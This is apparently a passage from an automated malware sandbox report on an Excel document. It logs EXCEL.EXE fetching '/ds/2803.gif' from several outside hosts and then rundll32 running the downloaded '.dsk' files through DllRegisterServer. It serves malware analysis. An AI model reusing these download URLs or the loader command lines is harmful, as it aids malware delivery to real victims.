                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: kristen.sbddev.com
                Connection: Keep-Alive
                Apr 7, 2021 10:46:54.877640009 CEST2OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: kristen.sbddev.com
                Connection: Keep-Alive
                Apr 7, 2021 10:46:55.087573051 CEST3INHTTP/1.1 200 OK
                Server: nginx/1.18.0
                Date: Wed, 07 Apr 2021 08:46:55 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: keep-alive
                Content-Encoding: gzip
                Data Raw: 66 66 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 cc 59 59 93 a3 48 92 7e 9f 5f a1 ad b5 35 9b 31 3a 8b fb aa ae 6a 5b 6e 90 04 02 04 08 f4 86 b8 c5 29 6e 69 6d ff fb 42 66 1d 99 d9 5d dd 3b 63 fb b0 f1 20 20 dc c3 c3 fd 0b 77 8f 90 c7 e7 7f e3 0f 9c e5 e9 c2 26 ed cb e2 b7 bf 7d 7e 79 6c 96 f6 39 8d fc f0 b7 bf 3d bf 96 51 ef 2f 1c 7d f3 14 dd 86 6c fc f2 81 ab ab 3e aa fa a7 fe de 44 1f 36 c1 cb d7 97 0f 7d 34 f7 e0 2a e2 d7 4d 90 fa 6d 17 f5 5f 86 3e 7e a2 3e fc 54 8e 1f a4 d1 d3 3a be ad 8b 57 82 aa fa 29 58 49 3f 1d a8 b7 7e 52 fa ff cc 08 61 6e b2 36 ea 5e 0d 81 de 48 af fc 32 fa f2 61 cc a2 a9 a9 db fe 15 db 94 85 7d fa 25 8c c6 2c 88 9e 9e 3f 7e d9 64 55 d6 67 7e f1 d4 05 7e 11 7d 81 3f 7e 17 d5 67 7d 11 fd c6 04 41 3d 54 fd e6 38 74 4d 54 85 51 f8 19 7c 21 bc c0 59 64 55 be 69 a3 e2 cb 87 ae bf 17 51 97 46 d1 32 61 da 46 f1 97 0f 20 38 74 d1 c7 78 41 c4 9f a2 ae 2e a3 8f 41 5d 82 0b 73 e4 77 51 07 8e f8 47 e8 23 01 06 5d 07 fa 45 f1 71 79 7e 33 e2 59 d4 66 5d 90 af eb f0 83 b6 ae e1 a5 0e ef 9b ff 7a 9e 7f fd 5c db 3a c9 53 ec 97 59 71 ff b4 61 da c5 9e 5f 36 72 54 8c 51 9f 05 fe 2f 9b ce af ba a7 2e 6a b3 f8 d7 df 0f eb b2 47 f4 69 03 63 cd fc 96 b8 98 16 3d a5 51 96 a4 fd 42 fe 88 21 14 4e c2 18 42 bf e5 ba f8 41 9e b4 0b 44 e1 b2 f6 45 dd 7e da fc 7b fc dc de b2 7d a3 21 22 8a a0 d0 5b 5a e3 87 61 56 25 9f 36 ef fa 4b bf 4d b2 ea 4d f7 7f 7f 57 bf 8b 82 3e ab ab 77 38 84 59 d7 14 fe 82 c1 a5 a8 83 fc ff 60 9a 65 c9 96 e5 5b 90 68 df cd f4 a2 dc 53 11 c5 0b 3a fe d0 d7 6f 27 fb 4a 6e 5f d0 fb 3d fd 87 cd 1b 18 7a 8d fc 0f 0b 3f ae b0 ac 36 2e ce 99 55 71 fd 4e 81 57 c0 b7 51 13 f9 8b 1a 4b a8 bd bc be d5 e5 15 e7 f7 65 a0 51 06 63 de b2 7d a3 89 cf ed 07 ed e7 1a 3d 65 7d 54 76 ef f4 fa 6e 19 f2 c6 ae d5 4b cb ac fa e1 50 34 fa 13 b3 57 5b 17 36 7f f5 89 77 b2 9f dd 7c fa ea 92 97 ba 08 7f 68 b9 ca 5f 73 d6 93 5f 64 c9 e2 34 eb c2 bc a5 4e 75 1b 3e 5d da c8 cf 17 f7 58 1f 0b 6b f1 8e 65 cd 0f 8b b3 43 d0 7f fc 20 bc b2 bf eb fd 7e e8 16 90 fd ee 77 ae f7 ac db 4b 2c 21 6f c6 af 9a fd 99 5f 7e c3 9d 7b 6e 7f 38 ef cb 84 4f ab 7d ef 10 f9 16 23 2b d8 ef e3 e7 95 46 30 f1 2f 82 fd 35 39 d0 3f 01 e4 e7 8a bd 9e 1c fb e3 d1 ff 59 46 61 e6 6f fe be ba c5 73 32 fe b4 21 09 aa 99 ff f1 ce c6 bf 08 84 15 df a6 ee 9e 43 e5 d3 9a 8b fd 3e 1b a3 1f 38 ae f4 b5 d5 63 d4 c6 45 3d 7d da a4 59 18 46 d5 ef 39 5e 05 4a 56 fa c9 92 15 ab ba 7a 27 e9 87 37 ac 32 df ab f6 87 11 b1 32 fe 49 54 bc 93 f8 b3 84 b3 4a f9 8a d2 9b d5 58 fb df 89 f8 33 37 5d d9 bf 7b 63 56 ad 49 fe 2d 10 3f 64 fd 78 fb 83 95 a2 69 e4 5f 5a a9 df 63 3c b4 c5 df 43 bf f7 3f 3d 63 0e 36 55 f2 eb 65 d9 20 09 ec 97 cc 61 0f e6 04 ed a4 a4 66 96 a6 1d ed 54 b0 93 e5 4d 5f 3f f9 1b c7 a8 cb 93 6b e7 6b 1a ae 3d 3d cc aa 8e 60 af af 4b e3 c1 ff c7 0d 07 e2 ea af d4 23 80 b1 fd 2b 9e af 74 20 c3 a3 d0 5a ad d6 5d f3 68 15 0b 2e 86 c0 31 93 21 b2 49 a0 70 46 bd e7 19 e8 c0 cf 8c 29 a4 aa 2d 9a 9e 2b b1 b9 2f cd 53 28 a7 54 a2 1c 95 eb 96 b3 cb ed 3d a9 77 c7 ba dd 73 d0 b0 7f 30 93 6a 29 0f 8d b7 11 ed 91 e0 32 39 43 ee 22 9f ab c2 ad 29 88 76 c4 c8 bd eb 16 0f a9 a3 4c d2 32 50 4e cc e5 b9 d9 cd a9 32 f5 0a 3b 25 ca e0 79 d8 b0 1c 81 9c 2d 72 6b f6 3b 9e 34 a8 1e 39 93 73 c3 a3 15 d1 e5 3e 0d 22 17 95 56 c7 07 51 4b c2 dd 15 eb 9d 1c 97 69 54 47 d3 4c 07 5e 94 3a 83 2e ab 16 76 6d d2 3b db 6b f2 2c 1b 25 2f 25 ec 78 be ba ec 70 d2 90 a4 4e 2e fa 9d 30 fb e0 10 5d 35 7d 16 f3 0b c0 09 5e 2a 73 71 b9 25 78 e3 98 c6 82 14 ab 3d 09 8b 07 3d 69 04 58 97 0f aa 25 78
                Data Ascii: ff3YYH~_51:j[n)nimBf];c w&}~yl9=Q/}l>D6}4*Mm_>~>T:W)XI?~Ran6^H2a}%,?~dUg~~}?~g}A=T8tMTQ|!YdUiQF2aF 8txA.A]swQG#]Eqy~3Yf]z\:SYqa_6rTQ/.jGic=QB!NBADE~{}!"[ZaV%6KMMW>w8Y`e[hS:o'Jn_=z?6.UqNWQKeQc}=e}TvnKP4W[6w|h_s_d4Nu>]XkeC ~wK,!o_~{n8O}#+F0/59?YFaos2!C>8cE=}YF9^JVz'722ITJX37]{cVI-?dxi_Zc<C?=c6Ue afTM_?kk==`K#+t Z]h.1!IpF)-+/S(T=ws0j)29C")vL2PN2;%y-rk;49s>"VQKiTGL^:.vm;k,%/%xpN.0]5}^*sq%x==iX%x


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.224916831.170.166.13980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Apr 7, 2021 10:46:55.395570040 CEST7OUTGET /ds/2803.gif HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: tienda.ventadigital.com.ar
                Connection: Keep-Alive
                Apr 7, 2021 10:46:55.620822906 CEST7INHTTP/1.1 503 Service Unavailable
                Connection: Keep-Alive
                X-Powered-By: PHP/7.2.34
                Content-Type: text/html; charset=UTF-8
                Content-Length: 97
                Content-Encoding: gzip
                Vary: Accept-Encoding
                Date: Wed, 07 Apr 2021 08:46:55 GMT
                Server: LiteSpeed
                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 f3 cb 2f 51 70 cb 2f cd 4b d1 b3 d1 cf 30 b4 0b c9 48 55 28 4a 2d 2c 4d 2d 2e 49 4d 51 08 0d f2 51 d0 4f 29 d6 37 b2 30 30 d6 4b cf 4c 53 28 4f 2c 56 c8 cb 2f 51 48 03 e9 50 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 03 00 8c 1f 10 3a 4f 00 00 00
                Data Ascii: 0/Qp/K0HU(J-,M-.IMQQO)700KLS(O,V/QHPS(,V(N-*K-:O


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.2.2249169143.95.33.9680C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Apr 7, 2021 10:46:55.942820072 CEST8OUTGET /ds/2803.gif HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: thirdstringcalifornia.com
                Connection: Keep-Alive
                Apr 7, 2021 10:46:56.220531940 CEST9INHTTP/1.1 503 Service Unavailable
                Server: nginx/1.18.0
                Date: Wed, 07 Apr 2021 08:46:56 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: keep-alive
                Data Raw: 34 66 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 73 2f 32 38 30 33 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a
                Data Ascii: 4f<h1>Not Found.</h1>The requested URL /ds/2803.gif was not found on this server.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                3192.168.2.2249170103.68.166.12980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Apr 7, 2021 10:46:56.392405987 CEST10OUTGET /ds/2803.gif HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: holmesservices.mobiledevsite.co
                Connection: Keep-Alive
                Apr 7, 2021 10:46:56.506817102 CEST10INHTTP/1.1 503 Service Unavailable
                Server: nginx
                Date: Wed, 07 Apr 2021 08:46:56 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                X-Powered-By: PHP/7.4.12
                Data Raw: 34 66 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 73 2f 32 38 30 33 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 30 0d 0a 0d 0a
                Data Ascii: 4f<h1>Not Found.</h1>The requested URL /ds/2803.gif was not found on this server.0


                Session IDSource IPSource PortDestination IPDestination PortProcess
                4192.168.2.224917166.36.231.4080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Apr 7, 2021 10:46:56.842498064 CEST11OUTGET /ds/2803.gif HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: nellaimasthanbiryani.com
                Connection: Keep-Alive
                Apr 7, 2021 10:46:57.104089022 CEST11INHTTP/1.1 503 Service Unavailable
                Server: nginx
                Date: Wed, 07 Apr 2021 08:47:00 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: keep-alive
                X-Powered-By: PHP/5.6.40
                Data Raw: 34 66 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 73 2f 32 38 30 33 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 30 0d 0a 0d 0a
                Data Ascii: 4f<h1>Not Found.</h1>The requested URL /ds/2803.gif was not found on this server.0


                Code Manipulations

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:10:46:36
                Start date:07/04/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13fbb0000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:46:42
                Start date:07/04/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\iekdhfe.dsk,DllRegisterServer
                Imagebase:0xff3c0000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:46:43
                Start date:07/04/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\iekdhfe.dsk1,DllRegisterServer
                Imagebase:0xff3c0000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:46:43
                Start date:07/04/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\iekdhfe.dsk2,DllRegisterServer
                Imagebase:0xff3c0000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:46:43
                Start date:07/04/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\iekdhfe.dsk3,DllRegisterServer
                Imagebase:0xff3c0000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:46:44
                Start date:07/04/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\iekdhfe.dsk4,DllRegisterServer
                Imagebase:0xff3c0000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >